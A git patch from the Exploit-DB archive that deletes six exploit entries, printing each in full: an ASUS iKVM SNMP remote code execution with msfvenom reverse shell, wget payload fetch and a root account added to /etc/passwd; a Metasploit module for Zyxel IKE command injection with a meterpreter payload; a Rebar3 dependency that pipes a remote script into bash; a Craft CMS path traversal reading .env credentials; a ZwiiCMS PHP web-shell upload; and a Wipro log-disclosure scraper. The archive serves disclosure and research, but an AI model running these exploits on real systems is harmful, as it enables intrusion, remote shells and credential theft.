From 859e322e5cce8f24d187c20a76d9990fb1427e36 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 3 Jul 2024 00:16:27 +0000 Subject: [PATCH] DB: 2024-07-03 13 changes to exploits/shellcodes/ghdb ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit) Rebar3 3.13.2 - Command Injection Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated) Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure --- exploits/hardware/remote/52033.txt | 61 ----------- exploits/hardware/remote/52049.rb | 152 ---------------------------- exploits/multiple/webapps/52051.txt | 41 -------- exploits/php/webapps/52034.txt | 111 -------------------- exploits/php/webapps/52050.txt | 62 ------------ exploits/windows/remote/52032.py | 77 -------------- files_exploits.csv | 6 -- 7 files changed, 510 deletions(-) delete mode 100644 exploits/hardware/remote/52033.txt delete mode 100755 exploits/hardware/remote/52049.rb delete mode 100644 exploits/multiple/webapps/52051.txt delete mode 100644 exploits/php/webapps/52034.txt delete mode 100644 exploits/php/webapps/52050.txt delete mode 100755 exploits/windows/remote/52032.py diff --git a/exploits/hardware/remote/52033.txt b/exploits/hardware/remote/52033.txt deleted file mode 100644 index e683aea132..0000000000 --- a/exploits/hardware/remote/52033.txt +++ /dev/null 
@@ -1,61 +0,0 @@ -# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access -# Date: 2023-02-16 -# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023] -# Vendor Homepage: https://servers.asus.com/search?q=ASMB8 -# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others) -# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl -# CVE: CVE-2023-26602 - -++++++++++++++++++++ -0x00 DESCRIPTION -++++++++++++++++++++ -During a recent engagement, a remote server management interface has been -discovered. Furthermore, SNMPv2 was found to be enabled, offering write -access to the private community, subsequently allowing us to introduce -SNMP arbitrary extensions to achieve RCE. -We also found a hardcoded account sysadmin:superuser by cracking the -shadow file (md5crypt) found on the system and identifed an "anonymous" -user w/ the same password, however a lock seems to be in place to prevent -using these credentials via SSH (running defshell as default shell). -+++++++++++++++ -0x01 IMPACT -+++++++++++++++ -By exploiting SNMP arbitrary extension, we are able to run any command on -the system w/ root privileges, and we are able to introduce our own user -circumventing the defshell restriction for SSH. -+++++++++++++++++++++++++++++++ -0x02 PROOF OF CONCEPT (PoC) -+++++++++++++++++++++++++++++++ -At first, we have to create required extensions on the system, e.g. via -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "[command]"' -and if everything is set, we can just run that command by -snmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects -which will execute our defined command and show us its output. -+++++++++++++++++++++++++++++++ -0x03 SSH Remote Root Access -+++++++++++++++++++++++++++++++ -The identified RCE can be used to transfer a reverse tcp shell created -by msfvenom for arm little-endian, e.g. 
-msfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin -We can now transfer the binary, adjust permissions and finally run it: -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin"' -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod +x /var/tmp/rt.bin"' -snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "/var/tmp/rt.bin"' -Again, we have to request execution of the lines in the MIB via: -snmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects -We get a reverse connection from the host, and can now act on the local system -to easily echo our own line into /etc/passwd: -echo d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd -By setting the standard shell to /bin/sh, we are able to get a SSH root -shell into the system, effectively circumventing the defshell restriction. -$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g -BusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash) -Enter 'help' for a list of built-in commands. -# uname -a -Linux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown -# uptime -15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25 -# head -n 1 /etc/shadow -sysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7::: ---- -#EOF \ No newline at end of file diff --git a/exploits/hardware/remote/52049.rb b/exploits/hardware/remote/52049.rb deleted file mode 100755 index 47cafd353b..0000000000 --- a/exploits/hardware/remote/52049.rb +++ /dev/null 
@@ -1,152 +0,0 @@ -# Exploit Title: Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution -# Date: 2023-03-31 -# Exploit Author: sf -# Vendor Homepage: https://www.zyxel.com/ -# Software Link: https://www.zyxel.com/ -# Version: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), -# VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive) -# Tested on: Linux -# CVE : CVE-2023-28771 - - -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::Udp - def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution', - 'Description' => %q{ - This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange - (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are - as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive), - VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The - affected devices are vulnerable in a default configuration and command execution is with root privileges. 
- }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'sf', # MSF Exploit & Rapid7 Analysis - ], - 'References' => [ - ['CVE', '2023-28771'], - ['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'], - ['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls'] - ], - 'DisclosureDate' => '2023-03-31', - 'Platform' => %w[unix linux], - 'Arch' => [ARCH_CMD], - 'Privileged' => true, # Code execution as 'root' - 'DefaultOptions' => { - # We default to a meterpreter payload delivered via a fetch HTTP adapter. - # Another good payload choice is cmd/unix/reverse_bash. - 'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp', - 'FETCH_WRITABLE_DIR' => '/tmp', - 'FETCH_COMMAND' => 'CURL' - }, - 'Targets' => [ [ 'Default', {} ] ], - 'DefaultTarget' => 0, - 'Notes' => { - # The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart. - 'Stability' => [CRASH_SERVICE_RESTARTS], - 'Reliability' => [REPEATABLE_SESSION], - 'SideEffects' => [IOC_IN_LOGS] - } - ) - ) - - register_options( - [ - Opt::RPORT(500) - ] - ) - end - - - def check - connect_udp - - # Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can - # expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message. - - # In a default configuration, there appears no known method to identify the platform vendor or version - # number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown. - # If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we - # still would not be able to identify the version number of the target service. 
- - ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI - ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI - ikev2_header << [0].pack('C') # Next Payload: None - 0 - ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10) - ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2 - ikev2_header << [0].pack('C') # Flags: None - 0 - ikev2_header << [0].pack('N') # ID: 0 - ikev2_header << [ikev2_header.length + 4].pack('N') # Length - - udp_sock.put(ikev2_header) - - ikev2_reply = udp_sock.get(udp_sock.def_read_timeout) - - disconnect_udp - - if !ikev2_reply.empty? && (ikev2_reply.length >= 40) && - # Ensure the response 'Initiator SPI' field is the same as the original one sent. - (ikev2_reply[0, 8] == ikev2_header[0, 8]) && - # Ensure the 'Next Payload' field is Notification (11) - (ikev2_reply[16, 1].unpack('C').first == 11 && - # Ensure the 'Exchange Type' field is Informational (5) - (ikev2_reply[18, 1].unpack('C').first == 5)) && - # Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16) - (ikev2_reply[38, 2].unpack('n').first == 16) - return CheckCode::Detected('IKE detected but device vendor and service version are unknown.') - end - - CheckCode::Unknown - end - - def exploit - execute_command(payload.encoded) - end - - def execute_command(cmd) - connect_udp - - cmd_injection = "\";bash -c \"#{cmd}\";echo -n \"" - - # This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the - # log file. As such the decoded value must not have any null terminator values as these will break our command - # payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd - # injection payload to work as expected. 
- haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB' - - ikev2_payload = [0].pack('C') # Next Payload: None - 0 - ikev2_payload << [0].pack('C') # Reserved: 0 - ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data - ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1 - ikev2_payload << [0].pack('C') # SPI Size: None - 0 - ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E) - ikev2_payload << haxb48 + cmd_injection # Notification Data - - ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI - ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI - ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29) - ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20) - ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22) - ikev2_header << [8].pack('C') # Flags: Initiator - 8 - ikev2_header << [0].pack('N') # ID: 0 - ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length - - packet = ikev2_header << ikev2_payload - - udp_sock.put(packet) - - disconnect_udp - end - -end \ No newline at end of file diff --git a/exploits/multiple/webapps/52051.txt b/exploits/multiple/webapps/52051.txt deleted file mode 100644 index 2084deb10e..0000000000 --- a/exploits/multiple/webapps/52051.txt +++ /dev/null 
@@ -1,41 +0,0 @@ -# Exploit Title: Rebar3 3.13.2 Command Injection -# Date: 2020-06-03 -# Exploit Author: Alexey Pronin -# Vendor Homepage: https://rebar3.org -# Software Link: https://github.com/erlang/rebar3 -# Versions affected: 3.0.0-beta.3 - 3.13.2 -# Tested on: Linux -# CVE: CVE-2020-13802 - -1. Description: ----------------------- - -Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification. - -2. Proof of Concept: ----------------------- - -* Add dependency with any of the following specification: - - { - 'dephelper', ".*", { - hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", - "dephelper"} - } - - or - - { - 'poc_rebar3', ".*", { - git, "https://github.com/vulnbe/poc-rebar3.git" - } - } - -* Execute command: rebar3 clean - -References ----------------------- -* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/) -* [POC](https://github.com/vulnbe/poc-rebar3.git) -* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302) -* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802) \ No newline at end of file diff --git a/exploits/php/webapps/52034.txt b/exploits/php/webapps/52034.txt deleted file mode 100644 index cee9119053..0000000000 --- a/exploits/php/webapps/52034.txt +++ /dev/null 
@@ -1,111 +0,0 @@ -# Exploit Title: Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated) -# Date: 2022.01.26 -# Exploit Author: Steffen Rogge -# Vendor Homepage: https://github.com/ethercreative/logs -# Software Link: https://plugins.craftcms.com/logs -# Version: <=3.0.3 -# Tested on: Linux -# CVE : CVE-2022-23409 - -product: Ethercreative Logs plugin for Craft CMS -fixed version: >=3.0.4 -impact: Medium -found: 2021-07-06 -SEC Consult Vulnerability Lab -An integrated part of SEC Consult, an Atos company -Europe | Asia | North America -https://www.sec-consult.com -======================================================================= -Vendor description: -------------------- -"A quick and dirty way to access your logs from inside the CP" -As found on the plugin store page: https://plugins.craftcms.com/logs -Active Installs 4,093 (as of 2021-07-07) -Business recommendation: ------------------------- -The vendor provides a patched version v3.0.4 which should be installed immediately. -Vulnerability overview/description: ------------------------------------ -1) Authenticated Path Traversal (CVE-2022-23409) -The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside -the backend of the CMS. As the requested logfile is not properly validated, an attacker is -able to request arbitrary files from the underlying file system with the permissions of the -web service user. -Proof of concept: ------------------ -1) Authenticated Path Traversal (CVE-2022-23409) -As the plugin is installed as an administrator of the system and the function is only accessible -after being logged in as an admin, an attacker needs to be authenticated as an administrator in -the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request. 
-The vulnerable endpoint is provided by the plugin under the following path: -https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream -The vulnerable controller for that endpoint can be found here: -https://github.com/ethercreative/logs/blob/master/src/Controller.php -The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input -values before file content is being read by the function "file_get_contents". -public function actionStream () -{ -$logsDir = \Craft::getAlias('@storage/logs'); -$logFile = \Craft::$app->request->getParam('log'); -$currentLog = \Craft::$app->request->get('log', $logFile); -$log = file_get_contents($logsDir . '/' . $currentLog); -exit($log); -} -A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem -with rights as the user executing the web server. In most cases this will be the user "www-data". -In order to read the file ".env" or ".env.php" which contains the environment configuration and as -such also the database credentials, the following request can be used: -GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1 -Host: -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 -Connection: close -Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=; -The response then discloses the file content of the file ".env": -HTTP/1.1 200 OK -Date: Thu, 07 Jul 2021 10:08:52 GMT -Server: nginx -Content-Type: text/html; charset=UTF-8 -Expires: Thu, 19 Nov 1981 08:52:00 GMT -Cache-Control: no-store, no-cache, must-revalidate -Pragma: no-cache -Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly -Content-Length: 1600 -Connection: close -[...] 
-$craftEnvVars = [ -'DB_DRIVER' => 'mysql', -'DB_SERVER' => '********', -'DB_USER' => '********', -'DB_PASSWORD' => '********', -'DB_DATABASE' => '********', -'DB_SCHEMA' => 'public', -'DB_TABLE_PREFIX' => '', -'DB_PORT' => '********', -'SECURITY_KEY' => '********', -[...] -Vulnerable / tested versions: ------------------------------ -The following version has been tested which was the latest version available at the time -of the test: -* Version 3.0.3 released on November 25, 2019 -Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs -Vendor contact timeline: ------------------------- -2021-07-07: Contacting vendor through dev@ethercreative.co.uk -2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible -for any risks involved with plaintext communication -2021-07-08: Advisory was sent to vendor unencrypted -2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4 -(https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4) -2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation -(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4) -2022-01-24: Release of security advisory -Solution: ---------- -The vendor released a patched version 3.0.4 or higher which can be retrieved from their -website/github: -https://plugins.craftcms.com/logs -https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4 -Workaround: ------------ -Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services. \ No newline at end of file diff --git a/exploits/php/webapps/52050.txt b/exploits/php/webapps/52050.txt deleted file mode 100644 index 78f500d818..0000000000 --- a/exploits/php/webapps/52050.txt +++ /dev/null 
@@ -1,62 +0,0 @@ -# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated) -# Date: 03/06/2023 -# Exploit Author: Hadi Mene -# Vendor Homepage: https://zwiicms.fr/ -# Version: 12.2.04 and potentially lower versions -# Tested on: Linux -# CVE: CVE-2020-10567 -# Category: webapps - - -ZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible for -an authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution -due to a lack of extension check on the uploaded file. - -Original CVE author : hackoclipse -https://github.com/trippo/ResponsiveFilemanager/issues/600 - - -Vulnerable code (ajax_calls.php) : - -// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without being -necessarily an image - -81 case 'save_img': -82 $info = pathinfo($_POST['name']); -83 $image_data = $_POST['url']; -84 -85 if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) { -86 $image_data = substr($image_data, strpos($image_data, ',') + 1); -87 $type = strtolower($type[1]); // jpg, png, gif -88 -89 $image_data = base64_decode($image_data); - - -PoC: - -1) Login in the Administration Panel. -2) Click on the Folder icon on the top of the panel. -3) Open the Developer Tools for that page. -4) Copy,Edit and Execute the Javascript Code below . 
-5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMAND - -Javascript Code -###### - -function submitRequest() - { - var xhr = new XMLHttpRequest(); - xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true); - xhr.setRequestHeader("Accept", "*\/*"); - xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8"); - xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); - xhr.withCredentials = true; - var body = "url=&path=&name=shell.php"; - var aBody = new Uint8Array(body.length); - for (var i = 0; i < aBody.length; i++) - aBody[i] = body.charCodeAt(i); - xhr.send(new Blob([aBody])); - } -submitRequest(); - -###### \ No newline at end of file diff --git a/exploits/windows/remote/52032.py b/exploits/windows/remote/52032.py deleted file mode 100755 index c7107104c1..0000000000 --- a/exploits/windows/remote/52032.py +++ /dev/null 
@@ -1,77 +0,0 @@ -# Exploit Title: Wipro Holmes Orchestrator 20.4.1 - Log File Disclosure -# Date: 09/08/2021 -# Exploit Author: Rizal Muhammed @ub3rsick -# Vendor Homepage: https://www.wipro.com/holmes/ -# Version: Wipro Holmes Orchestrator v20.4.1 -# Tested on: Windows -# CVE : CVE-2021-38283 - -import requests as rq -import argparse -import datetime -import os -from calendar import monthrange -from multiprocessing.dummy import Pool as ThreadPool -from functools import partial - -# Change if running on different port -port = 8001 -log_list = [ - "AlertService.txt", "ApprovalService.txt", "AuditService.txt", "CustomerController.txt", - "CustomerDomainCredentialService.txt", "CustomerFile.zip", "CustomerService.txt", - "DashboardController.txt", "DataParseService.txt", "DomainService.txt", "ExecutionService.txt", - "ExternalAPIService.txt", "FilesController.txt", "FormService.txt", "InfrastructureService.txt", - "ITSMConfigPrepService.txt", "LicenseService.txt", "LoginService.txt", "MailService.txt", - "MasterdataController.txt", "NetworkService.txt", "OrchestrationPreparationService.txt", - "ProblemInfrastructureService.txt", "ProcessExecutionService.txt", "ServiceRequestService.txt", - "SolutionController.txt", "SolutionLiveService.txt", "SolutionService.txt", "StorageService.txt", - "TaskService.txt", "TicketingService.txt", "UserController.txt", "UtilityService.txt" -] - -def check_month(val): - ival = int(val) - if ival > 0 and ival < 13: - return ival - else: - raise argparse.ArgumentTypeError("%s is not a valid month" % val) - -def check_year(val): - iyear = int(val) - if iyear >= 1960 and iyear <= datetime.date.today().year: - return iyear - else: - raise argparse.ArgumentTypeError("%s is not a valid year" % val) - -def do_request(target, date, log_file): - log_url = f"http://{target}/log/{date}/{log_file}" - log_name = f"{date}_{log_file}" - print(f"[*] Requesting Log: /log/{date}/{log_file}") - resp = rq.get(log_url) - if resp.status_code == 200 and not 
"Wipro Ltd." in resp.text: - print(f"[+] Success: {log_url}") - with open(f"logs/{log_name}", 'w') as lf: - lf.write(resp.text) - print(f"[*] Log File Written to ./logs/{log_name}") - -def main(): - parser = argparse.ArgumentParser(description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure", - epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick") - parser.add_argument("-t", "--target-ip", help="IP Address of the target server", required=True) - parser.add_argument("-m", "--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month) - parser.add_argument("-y", "--year", help="Year of the log", required=True, type=check_year) - args = parser.parse_args() - - ndays = monthrange(args.year, args.month)[1] - date_list = [f"{datetime.date(args.year, args.month, day)}" for day in range(1, ndays + 1)] - target = f"{args.target_ip}:{port}" - - # Create folder "logs" to save log files, if it does not exist - if not os.path.exists("./logs"): - os.makedirs("./logs") - - for log_date in date_list: - for log_file in log_list: - do_request(target, log_date, log_file) - -if __name__ == "__main__": - main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 966949383a..03baae9afe 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -3342,7 +3342,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42726,exploits/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",remote,hardware,,2017-09-15,2017-09-15,0,CVE-2017-6315,,,,, 36511,exploits/hardware/remote/36511.txt,"Astaro Security Gateway 8.1 - HTML Injection",2012-12-27,"Vulnerability Research Laboratory",remote,hardware,,2012-12-27,2015-03-27,1,,,,,,https://www.securityfocus.com/bid/51301/info 22898,exploits/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router - Information Disclosure",2003-07-14,cw,remote,hardware,,2003-07-14,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8183/info -52033,exploits/hardware/remote/52033.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE) & SSH Access",2024-06-01,ub3rsick,remote,hardware,,2024-06-01,2024-06-01,0,CVE-2023-26602,,,,, 44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999,2018-04-24,2018-05-02,1,CVE-2014-9583,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/37a844bef0e2fc648663d3bd15ee9101a5b4511c/modules/exploits/linux/misc/asus_infosvr_auth_bypass_exec.rb 31033,exploits/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",remote,hardware,80,2014-01-20,2016-12-04,0,CVE-2013-6343;OSVDB-102267,,,,, 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware,,2015-01-04,2015-01-08,1,OSVDB-116691;CVE-2014-9583,,,,, 
@@ -4030,7 +4029,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware,,2009-08-17,,1,OSVDB-57419,,,,, 17244,exploits/hardware/remote/17244.txt,"ZyWALL USG Appliance - Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",remote,hardware,,2011-05-04,2011-05-04,1,,,,,,http://www.redteam-pentesting.de/advisories/rt-sa-2011-003 24760,exploits/hardware/remote/24760.txt,"ZYXEL 3 Prestige Router - HTTP Remote Administration Configuration Reset",2004-11-22,"Francisco Canela",remote,hardware,,2004-11-22,2013-03-13,1,CVE-2004-1540;OSVDB-12108,,,,,https://www.securityfocus.com/bid/11723/info -52049,exploits/hardware/remote/52049.rb,"Zyxel IKE Packet Decoder - Unauthenticated Remote Code Execution (Metasploit)",2024-06-14,ub3rsick,remote,hardware,,2024-06-14,2024-06-14,0,,,,,, 50870,exploits/hardware/remote/50870.txt,"Zyxel NWA-1100-NH - Command Injection",2022-04-19,"Ahmed Alroky",remote,hardware,,2022-04-19,2022-04-19,0,CVE-2021-4039,,,,, 30935,exploits/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,remote,hardware,,2007-12-25,2014-01-15,1,,,,,,https://www.securityfocus.com/bid/27024/info 43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware,,2017-11-01,2017-11-01,0,CVE-2016-10401,,,,, 
@@ -12209,7 +12207,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46585,exploits/multiple/webapps/46585.py,"Rails 5.2.1 - Arbitrary File Content Disclosure",2019-03-21,NotoriousRebel,webapps,multiple,,2019-03-21,2019-03-21,0,CVE-2019-5418,Traversal,,,, 46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple,,2019-05-06,2019-05-06,0,CVE-2018-20580,,,,, 48108,exploits/multiple/webapps/48108.txt,"Real Web Pentesting Tutorial Step by Step - [Persian]",2020-02-24,"Meisam Monsef",webapps,multiple,,2020-02-24,2020-02-24,0,,,,,, -52051,exploits/multiple/webapps/52051.txt,"Rebar3 3.13.2 - Command Injection",2024-06-14,ub3rsick,webapps,multiple,,2024-06-14,2024-06-14,0,,,,,, 10424,exploits/multiple/webapps/10424.txt,"Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin)",2009-12-14,p0deje,webapps,multiple,,2009-12-13,2015-07-12,0,,,,,, 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,,2019-06-17,2019-06-17,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 18553,exploits/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",webapps,multiple,,2012-03-03,2012-03-16,0,OSVDB-85702;OSVDB-79806;CVE-2012-4996;CVE-2012-4993;OSVDB-79805,,,,http://www.exploit-db.comrivettracker_1-03.zip, 
@@ -16518,7 +16515,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46054,exploits/php/webapps/46054.txt,"Craft CMS 3.0.25 - Cross-Site Scripting",2018-12-27,"Raif Berkay Dincel",webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-20418,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comCraft-3.0.25.rar, 46496,exploits/php/webapps/46496.txt,"Craft CMS 3.1.12 Pro - Cross-Site Scripting",2019-03-04,"Ismail Tasdelen",webapps,php,80,2019-03-04,2019-03-04,0,CVE-2019-9554,"Cross-Site Scripting (XSS)",,,, 51918,exploits/php/webapps/51918.py,"Craft CMS 4.4.14 - Unauthenticated Remote Code Execution",2024-03-25,"Olivier Lasne",webapps,php,,2024-03-25,2024-03-25,0,,,,,, -52034,exploits/php/webapps/52034.txt,"Craft CMS Logs Plugin 3.0.3 - Path Traversal (Authenticated)",2024-06-01,ub3rsick,webapps,php,,2024-06-01,2024-06-01,0,CVE-2022-23409,,,,, 48492,exploits/php/webapps/48492.py,"CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution",2020-05-20,"Wade Guest",webapps,php,,2020-05-20,2020-05-20,0,,,,,, 1645,exploits/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,webapps,php,,2006-04-03,,1,OSVDB-24387;CVE-2006-1668;OSVDB-24386;CVE-2006-1667,,,,, 6307,exploits/php/webapps/6307.txt,"Crafty Syntax Live Help 2.14.6 - 'department' SQL Injection",2008-08-25,"GulfTech Security",webapps,php,,2008-08-24,2018-01-05,1,OSVDB-47782;CVE-2008-3845;OSVDB-47781;GTSA-00119,,,,,http://gulftech.org/advisories/Crafty%20Syntax%20Live%20Help%20SQL%20Injection/119 
